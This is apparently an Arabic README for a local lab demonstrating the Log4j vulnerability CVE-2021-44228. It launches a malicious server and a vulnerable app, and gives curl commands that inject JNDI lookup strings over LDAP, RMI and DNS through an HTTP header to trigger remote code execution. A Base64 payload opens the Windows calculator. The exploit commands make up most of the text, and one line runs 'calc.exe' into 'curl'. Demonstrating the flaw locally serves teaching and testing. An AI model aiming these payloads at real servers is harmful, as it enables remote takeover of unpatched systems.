
أمثلة على Log4j CVE-2021-44228: تنفيذ التعليمات البرمجية عن بُعد (عبر LDAP، RMI، ...)، استعلامات DNS القسرية، ...
استخدم JDK ضعيف، على سبيل المثال JDK 1.8.0_181
ينشر الخادم الخبيث نقاط النهاية التالية:
./gradlew :malicious-server:bootRun
ينشر التطبيق الضعيف نقطة نهاية HTTP واحدة على 8082
./gradlew :vulnerable-app:bootRun
اختر حمولة (payload) سيتم تنفيذها بواسطة التطبيق الضعيف وقم بتشفيرها في Base64. كمثال، لفتح الآلة الحاسبة في ويندوز:
calc.execurl --header "X-Vulnerable-Header: ${jndi:ldap://localhost:1389/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/
curl --header "X-Vulnerable-Header: ${jndi:rmi://localhost:1099/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/
curl --header "X-Vulnerable-Header: ${jndi:dns://8.8.8.8/google.es}" http://127.0.0.1:8082/